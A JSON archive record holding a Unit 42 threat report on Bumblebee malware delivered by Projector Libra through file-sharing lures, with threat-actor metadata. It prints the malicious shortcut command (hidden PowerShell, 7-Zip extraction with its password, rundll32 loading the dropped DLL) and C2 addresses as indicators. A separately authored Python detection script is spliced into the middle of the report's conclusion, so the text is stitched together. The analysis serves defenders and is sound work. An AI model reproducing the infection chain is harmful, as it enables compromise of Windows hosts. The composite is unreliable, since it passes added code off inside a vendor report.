{
	"id": "56b17987-23f0-456d-8090-e0a0536d7fc0",
	"created_at": "2026-04-06T00:16:32.21978Z",
	"updated_at": "2026-04-10T03:37:23.841168Z",
	"deleted_at": null,
	"sha1_hash": "25af33bb5f05915fcd24c97b36e36ebc22e2a225",
	"title": "Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2465030,
	"plain_text": "Flight of the Bumblebee: Email Lures and File Sharing Services\r\nLead to Malware\r\nBy Brad Duncan\r\nPublished: 2022-08-03 · Archived: 2026-04-05 13:20:35 UTC\r\nExecutive Summary\r\nAmong the threat actors distributing Bumblebee is Projector Libra. Also known as EXOTIC LILY, Projector Libra\r\nis a criminal group that uses file sharing services to distribute malware after direct email correspondence with a\r\npotential victim. Projector Libra has been reported as an initial access broker with ties to Conti ransomware.\r\nThis blog presents a case study from recent Bumblebee malware activity distributed through Projector Libra that\r\nled to Cobalt Strike. Information presented here should provide a clearer picture of the group’s tactics and help\r\nsecurity professionals better defend their organizations against this threat.\r\nPalo Alto Networks customers are protected from Bumblebee with Cortex XDR or our Next-Generation Firewall\r\nwith WildFire and Threat Prevention subscriptions.\r\nFull visualization of the techniques observed, relevant courses of action and IoCs related to this report can be\r\nfound in the Unit 42 ATOM viewer.\r\nPrimary Malware Discussed: Bumblebee\r\nPrimary Threat Actors Discussed: Projector Libra/EXOTIC LILY\r\nOperating System Affected: Windows\r\nRelated Unit 42 Topics: Malware, phishing\r\nBumblebee Replaces BazarLoader\r\nBumblebee malware replaced BazarLoader sometime in February 2022. Since then, campaigns that formerly\r\ndistributed BazarLoader are now distributing Bumblebee instead.\r\nBumblebee’s predecessor first appeared as early as April 2020, when developers behind Trickbot released a new\r\nmalware called BazarBackdoor. The loader component of this malware was dubbed BazarLoader, and\r\nBazarLoader was a notable part of our threat landscape throughout 2020 and 2021.\r\nDuring the summer of 2021, BazarLoader reached peak distribution with at least three campaigns pushing the\r\nmajority of samples. 
These campaigns/threat actors were TA551 (Shathak), TA578 (Contact Forms/Stolen Images\r\nEvidence) and a call center-assisted campaign nicknamed BazarCall.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 1 of 11\n\nBazarLoader remained active through February 2022, but no newly created samples have been discovered since\r\nthen. Starting in March 2022, threat actors like Projector Libra who had been distributing BazarLoader switched\r\nto pushing a new malware family called Bumblebee. Security researchers dubbed this malware Bumblebee\r\nbecause it uses “bumblebee” in the user-agent string generated during post-infection HTTPS traffic.\r\nThreat actors like TA578 previously switched between distributing BazarLoader or distributing IcedID (Bokbot)\r\nmalware. Since March 2022, these threat actors have stopped pushing BazarLoader. For example, TA578 now\r\nswitches between pushing Bumblebee or pushing IcedID.\r\nMalware distribution patterns reveal Bumblebee continues where BazarLoader left off, which includes pushing\r\nfollow-up malware like Cobalt Strike that can eventually lead to a ransomware infection.\r\nTactics of Threat Actor Projector Libra\r\nGoogle’s Threat Analysis Group (TAG) previously presented a full attack chain for this threat actor, but our case\r\nexample begins with the first contact a potential victim receives from this threat actor.\r\nFigure 1. Chain of events for this case study.\r\nIf a potential victim responds to the initial email, Projector Libra sends a reply stating a separate email has been\r\nsent through a file sharing service to provide a file relevant to the discussion. The victim then receives an email\r\ngenerated by the file sharing service. These emails contain a link hosting malware disguised as a file discussed in\r\nthe previous Projector Libra message.\r\nSince 2022, files pushed by Projector Libra have been ISO images. These images are designed to infect a\r\nvulnerable Windows host. 
They contain a Windows shortcut, and this shortcut is designed to run Bumblebee\r\nmalware hidden in the same ISO.\r\nIn some cases, the ISO image contains a Windows shortcut (.LNK file) that runs a hidden DLL file for\r\nBumblebee.\r\nIn other cases, the ISO image contains a Bumblebee DLL stored inside a password-protected 7-Zip archive\r\n(.7Z file), which keeps the DLL opaque to content scanners until it is extracted on the host. In these cases, the\r\nLNK file runs a hidden copy of the 7-Zip standalone console to extract Bumblebee from its password-protected\r\n7Z file.\r\nIn an Active Directory (AD) environment, an initial Bumblebee infection leads to Cobalt Strike. Attackers use\r\nCobalt Strike to map the victim’s environment. If the results reveal a high-value target, attackers will attempt\r\nlateral movement and drop ransomware like Conti or Diavol.\r\nExamples of Email Messages\r\nThe first event in our case study is an initial email sent by Projector Libra on May 5, 2022. It spoofs an employee\r\nnamed Andres from a regional gas company in the United States.\r\nFigure 2 shows a screenshot of this initial email.\r\nFigure 2. Email from Projector Libra to establish correspondence.\r\nWhen a potential victim replied to the email shown above in Figure 2, Projector Libra responded with the email\r\nshown below in Figure 3. This response states that a document was sent through TransferXL in a separate email.\r\nFigure 3. Response from Projector Libra after a potential victim replied to the initial email.\r\nTransferXL is a legitimate file-sharing service with a free tier. It is one of many file sharing services with a free\r\npricing category that are frequently abused by criminal groups like Projector Libra. These TransferXL URLs\r\nexpire after one week, which helps conceal the malware from security researchers. 
Below, Figure 4 shows a\r\nTransferXL email from this case study sharing malware provided by Projector Libra.\r\nFigure 4. Email generated by TransferXL sharing malware from Projector Libra.\r\nMalware and Traffic From an Infection\r\nFiles shared through TransferXL are compressed and sent as ZIP archives. Figure 5 shows the TransferXL URL\r\nfrom this case study opened in a web browser and downloading malware provided by Projector Libra.\r\nFigure 5. TransferXL URL sending malware provided by Projector Libra.\r\nThe recipient extracts an ISO file from the TransferXL ZIP archive. In most GUI-based desktop environments,\r\nMicrosoft Windows included, double-clicking an ISO file mounts it as a new drive. In Windows 10, the downloaded\r\nISO mounts as a DVD drive, similar to DVD Drive E: in Figure 6. The container matters here: in the Windows 10\r\nbuilds current at the time, files inside a mounted image did not carry the Mark of the Web that the downloaded ZIP\r\nhad, so the shortcut ran without the usual warning for content from the internet.\r\nFigure 6. Downloaded ISO malware mounted as DVD Drive E: in Windows 10.\r\nShown above in Figure 6, the downloaded ISO file contains a Windows shortcut named Attachments.lnk. In\r\nMicrosoft Windows, the .lnk file extension remains hidden even if File Explorer is set to show file extensions, so\r\nthe shortcut appears simply as Attachments.\r\nAttachments.lnk runs cmd.exe, which launches a hidden-window PowerShell command that executes a copy of the\r\n7-Zip standalone console file named 7za.exe from the mounted image. Above, Figure 6 displays the full command\r\nfrom Attachments.lnk; the same command is listed under Indicators of Compromise at the end of this report.\r\n7za.exe extracts the Bumblebee malware DLL from a password-protected 7-Zip archive named archive.7z. Both\r\n7za.exe and archive.7z are hidden but can be revealed if File Explorer is configured to show hidden files.\r\nThe extracted Bumblebee DLL file is saved to C:\\ProgramData\\19a.dll, as shown below in Figure 7. 
The\r\nBumblebee DLL is executed with rundll32.exe, using oxgdXPSGPw as the exported entry point.\r\nFigure 7. The extracted Bumblebee malware DLL file saved to disk.\r\nTraffic generated by this infection is all HTTPS, so the C2 exchanges themselves are not visible on the wire; the\r\ndestination addresses and the Cobalt Strike domain below are the usable network indicators. Below, Figure 8\r\nshows the TransferXL URL used for this infection filtered in Wireshark. After the ISO was mounted and\r\nBumblebee was executed, we saw Bumblebee HTTPS C2 traffic on 54.38.139[.]20:443.\r\nFigure 8. Traffic from the infection filtered in Wireshark.\r\nApproximately 15 minutes after Bumblebee C2 traffic began, we saw Cobalt Strike activity using fuvataren[.]com\r\non 45.153.243[.]142:443 as shown below in Figure 9.\r\nFigure 9. Cobalt Strike traffic seen during the infection.\r\nIn our case example and lab tests, Bumblebee infections frequently led to Cobalt Strike activity. Palo Alto\r\nNetworks Unit 42 has reported Cobalt Strike activity from Bumblebee infections in the following tweets from our\r\n@Unit42_Intel handle on Twitter:\r\nApril 5, 2022\r\nMay 3, 2022\r\nMay 31, 2022\r\nJune 9, 2022\r\nJune 14, 2022\r\nIf the targeted environment is high-value, we might see further activity and possible lateral movement. However,\r\nthis case study did not provide a tempting target, and Cobalt Strike traffic ended abruptly after one hour and 11\r\nminutes.\r\nConclusion\r\nBumblebee is currently distributed by Projector Libra and other threat actors that previously pushed BazarLoader.\r\nProjector Libra runs a sophisticated campaign to establish correspondence with a potential victim before sending\r\nits malware using file sharing services like TransferXL.\r\nMalware from Projector Libra currently consists of ISO images containing Windows shortcuts and hidden files to\r\ninstall Bumblebee malware. Bumblebee is designed to infect Windows hosts. 
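The shortcut chain in this case study (a hidden-window PowerShell launched from the mounted ISO, 7za.exe extracting a password-protected archive into ProgramData, rundll32 loading the dropped DLL through a named export) leaves a process-creation trail that endpoint telemetry can catch without any file hash. The Python below is an added example written for this page, not code from Unit 42 or from the report: it runs three rules over constructed Sysmon-style process events modelled on the Attachments.lnk command line listed under Indicators of Compromise, then correlates an extraction into a folder with a later rundll32 load from the same folder. The event fields, the PIDs, the E: drive letter, the staging-folder list and the benign control event are assumptions.

```python
import re
from collections import defaultdict

# Double-quote and backslash characters, named so the Windows command lines below read clearly.
Q, BS = chr(34), chr(92)

def win(*parts):
    # Join path components with the Windows separator.
    return BS.join(parts)

# Folders loaders commonly stage payloads in (assumption: extend for your environment).
STAGING = tuple(BS + s + BS for s in ('programdata', 'appdata', 'temp', 'users' + BS + 'public'))
SYSTEM_DRIVE = 'c:'                          # assumption: Windows is installed on C:
SEVEN_ZIP = ('7z.exe', '7za.exe', '7zr.exe')
POWERSHELL = ('powershell.exe', 'pwsh.exe')
HIDDEN_WINDOW = re.compile('-w[a-z]* +h')    # -WindowStyle Hidden and abbreviations such as -w h, -win hidden

def split_args(cmdline):
    # Tokenize a Windows command line on spaces, keeping quoted runs together and dropping the quotes.
    args, cur, quoted = [], '', False
    for ch in cmdline:
        if ch == Q:
            quoted = not quoted
        elif ch == ' ' and not quoted:
            if cur:
                args.append(cur)
            cur = ''
        else:
            cur += ch
    if cur:
        args.append(cur)
    return args

def basename(path):
    return path.rstrip(BS).rsplit(BS, 1)[-1].lower()

def in_staging(path):
    return any(s in path.lower().rstrip(BS) + BS for s in STAGING)

def check_event(ev):
    # One process-creation event in; a list of (rule, detail) pairs out.
    hits, img, args = [], basename(ev['image']), split_args(ev['cmdline'])
    # Rule 1: hidden-window PowerShell whose working directory is not on the system drive
    # (a shortcut run from a mounted ISO starts its children with the image's drive letter as cwd).
    if img in POWERSHELL and HIDDEN_WINDOW.search(ev['cmdline'].lower()) and not ev['cwd'].lower().startswith(SYSTEM_DRIVE):
        hits.append(('hidden_powershell_off_system_drive', ev['cwd']))
    # Rule 2: 7-Zip console extracting a password-protected archive (-p) into a staging folder (-o).
    if img in SEVEN_ZIP and any(a.startswith('-p') for a in args[1:]):
        out = [a[2:] for a in args[1:] if a.startswith('-o')]
        if out and in_staging(out[0]):
            hits.append(('password_archive_to_staging', out[0]))
    # Rule 3: rundll32 loading a DLL from a staging folder through a named export.
    if img == 'rundll32.exe' and len(args) > 1:
        dll, _, export = ' '.join(args[1:]).partition(',')
        if export.strip() and in_staging(dll.strip()):
            hits.append(('rundll32_staged_dll', dll.strip()))
    return hits

def correlate(events):
    # Run the rules over every event, then pair an extraction into a folder with a later rundll32
    # load from that same folder: the archive-staged DLL pattern of this case study.
    found = defaultdict(list)
    for ev in events:
        for rule, detail in check_event(ev):
            found[rule].append((ev['pid'], detail))
    alerts = [(rule, pid, detail) for rule, hits in found.items() for pid, detail in hits]
    out_dirs = {d.lower().rstrip(BS) for _, d in found['password_archive_to_staging']}
    for pid, dll in found['rundll32_staged_dll']:
        if dll.lower().rsplit(BS, 1)[0] in out_dirs:
            alerts.append(('archive_staged_dll_execution', pid, dll))
    return alerts

# Constructed events in Sysmon Event ID 1 style, modelled on the Attachments.lnk command line from the
# IoC section; PIDs, the E: drive letter and the benign control are assumptions, not data from the report.
CMD = win('C:', 'Windows', 'System32', 'cmd.exe')
PS_SCRIPT = ('.' + BS + '7za.exe x archive.7z -pFhu$$57csa -o' + BS + Q + 'c:' + BS + 'programdata' + BS + Q
             + ' -y > $null; rundll32 c:' + BS + 'programdata' + BS + '19a.dll,oxgdXPSGPw')
EVENTS = [
    {'pid': 4100, 'image': CMD, 'cwd': 'E:' + BS,
     'cmdline': CMD + ' /c powershell -WindowStyle Hidden -Command ' + Q + PS_SCRIPT + Q},
    {'pid': 4108, 'image': win('C:', 'Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe'),
     'cwd': 'E:' + BS, 'cmdline': 'powershell -WindowStyle Hidden -Command ' + Q + PS_SCRIPT + Q},
    {'pid': 4120, 'image': 'E:' + BS + '7za.exe', 'cwd': 'E:' + BS,
     'cmdline': Q + '.' + BS + '7za.exe' + Q + ' x archive.7z -pFhu$$57csa -oc:' + BS + 'programdata' + BS + ' -y'},
    {'pid': 4132, 'image': win('C:', 'Windows', 'System32', 'rundll32.exe'), 'cwd': 'E:' + BS,
     'cmdline': 'rundll32 c:' + BS + 'programdata' + BS + '19a.dll,oxgdXPSGPw'},
    # Benign control: an administrator restoring an encrypted backup into their own profile from C:.
    {'pid': 5000, 'image': win('C:', 'Program Files', '7-Zip', '7z.exe'), 'cwd': win('C:', 'Users', 'admin'),
     'cmdline': '7z x backup.7z -psecret -o' + win('C:', 'Users', 'admin', 'restore')},
]

if __name__ == '__main__':
    for alert in correlate(EVENTS):
        print(*alert)
```

Running the file prints one line per alert. The combined alert is the one worth paging on: either half alone (an encrypted archive extracted to ProgramData, or rundll32 loading a DLL from there) also shows up in legitimate software installs, while the two together from the same folder within one process tree is the staging pattern of this ISO. These rules cover the host stage of the infection.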
In an AD environment, this\r\nfrequently leads to Cobalt Strike, which can in turn lead to a more serious ransomware infection.\r\nOur case study illustrates how Bumblebee malware from Projector Libra is seen from a victim’s perspective, and\r\nit can help security professionals better understand this threat to protect their organizations.\r\nWindows users can lower their risk from Bumblebee malware through spam filtering, proper system\r\nadministration and ensuring their software is patched and up to date. Palo Alto Networks customers receive further\r\nprotections from Bumblebee through Cortex XDR and our Next-Generation Firewall with WildFire and Threat\r\nPrevention subscriptions.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their\r\ncustomers and to systematically disrupt malicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nMalicious ZIP archive downloaded from link in TransferXL email:\r\nSHA256 hash: 58b9a5202a3cc96e86e24cd3c4b797d2efbf7d6b52461eef89b045aa1ff6c6ae\r\nFile size: 1,002,214 bytes\r\nFile location: hxxps://www.transferxl[.]com/download/00jJFzX0NZqb7p?\r\nutm_source=downloadmail\u0026utm_medium=e-mail\r\nNote: The file was available until 2022-05-26, and after that date, it was automatically removed by the file sharing\r\nservice.\r\nISO image extracted from the above zip archive:\r\nSHA256 hash: 9be296fc9b23ad6aed19934123db9c3a2406d544156b7768374e0f9a75eb1549\r\nFile size: 1,333,248 bytes\r\nFile name: SOW_2.iso\r\nContents of the above ISO image:\r\nSHA256 hash: a10291506b884327307ae6d97dd6c043e9f2b6283ca3889dc2f5936fb2357862\r\nFile size: 1,604 bytes\r\nFile name: Attachments.lnk\r\nFile description: Windows shortcut contained in ISO image\r\nShortcut: C:\\Windows\\System32\\cmd.exe /c powershell -WindowStyle Hidden -Command \".\\7za.exe x archive.7z\r\n-pFhu$$57csa -o\\\"c:\\programdata\\\" -y \u003e $null; rundll32 c:\\programdata\\19a.dll,oxgdXPSGPw\r\nSHA256 hash: c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf\r\nFile size: 643,147 bytes\r\nFile name: 7za.exe\r\nFile description: Copy of 7-Zip Standalone Console (not malicious) contained in ISO image\r\nSHA256 hash: e62b9513784ae339351de089dd356742aa1c95971ad8c0cf126f4e72131df96e\r\nFile size: 690,970 bytes\r\nFile name: archive.7z\r\nFile description: Password-protected 7-Zip archive, contains Bumblebee malware DLL\r\nPassword: Fhu$$57csa\r\nSHA256 hash: 024d048f8ce81e8784215dc6cf0e170b02307d9e8624083efdfccaf3e269a0f2\r\nFile size: 1,174,016 bytes\r\nFile location: C:\\ProgramData\\19a.dll\r\nFile description: 64-bit DLL for Bumblebee malware extracted from 7-Zip archive\r\nRun method: rundll32.exe [filename], oxgdXPSGPw\r\nBumblebee 
C2 Traffic:\r\n54.38.139[.]20:443 - HTTPS traffic\r\nCobalt Strike C2 Traffic:\r\n45.153.243[.]142:443 - fuvataren[.]com - HTTPS traffic\r\nSource: https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/"
	],
	"report_names": [
		"bumblebee-malware-projector-libra"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4594f985-865e-4862-8047-2e80226e246a",
			"created_at": "2022-10-27T08:27:12.984825Z",
			"updated_at": "2026-04-10T02:00:05.293575Z",
			"deleted_at": null,
			"main_name": "EXOTIC LILY",
			"aliases": [
				"EXOTIC LILY"
			],
			"source_name": "MITRE:EXOTIC LILY",
			"tools": [
				"Bazar"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "62585174-b1f8-47b1-9165-19b594160b01",
			"created_at": "2023-01-06T13:46:39.369991Z",
			"updated_at": "2026-04-10T02:00:03.304964Z",
			"deleted_at": null,
			"main_name": "TA578",
			"aliases": [],
			"source_name": "MISPGALAXY:TA578",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d1f8bd4e-bcd4-4101-9158-6158f1806b38",
			"created_at": "2023-01-06T13:46:39.487358Z",
			"updated_at": "2026-04-10T02:00:03.344509Z",
			"deleted_at": null,
			"main_name": "BazarCall",
			"aliases": [
				"BazzarCall",
				"BazaCall"
			],
			"source_name": "MISPGALAXY:BazarCall",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "52eb5fb6-706b-49c0-9ba5-43bea03940d0",
			"created_at": "2024-11-01T02:00:52.694476Z",
			"updated_at": "2026-04-10T02:00:05.410572Z",
			"deleted_at": null,
			"main_name": "TA578",
			"aliases": [
				"TA578"
			],
			"source_name": "MITRE:TA578",
			"tools": [
				"Latrodectus",
				"IcedID"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "56384d06-abc2-4853-8440-db4d7b7d1b5f",
			"created_at": "2023-01-06T13:46:39.367122Z",
			"updated_at": "2026-04-10T02:00:03.303733Z",
			"deleted_at": null,
			"main_name": "EXOTIC LILY",
			"aliases": [
				"DEV-0413"
			],
			"source_name": "MISPGALAXY:EXOTIC LILY",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434592,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/25af33bb5f05915fcd24c97b36e36ebc22e2a225.pdf",
		"text": "https://archive.orkl.eu/25af33bb5f05915fcd24c97b36e36ebc22e2a225.txt",
		"img": "https://archive.orkl.eu/25af33bb5f05915fcd24c97b36e36ebc22e2a225.jpg"
	}
}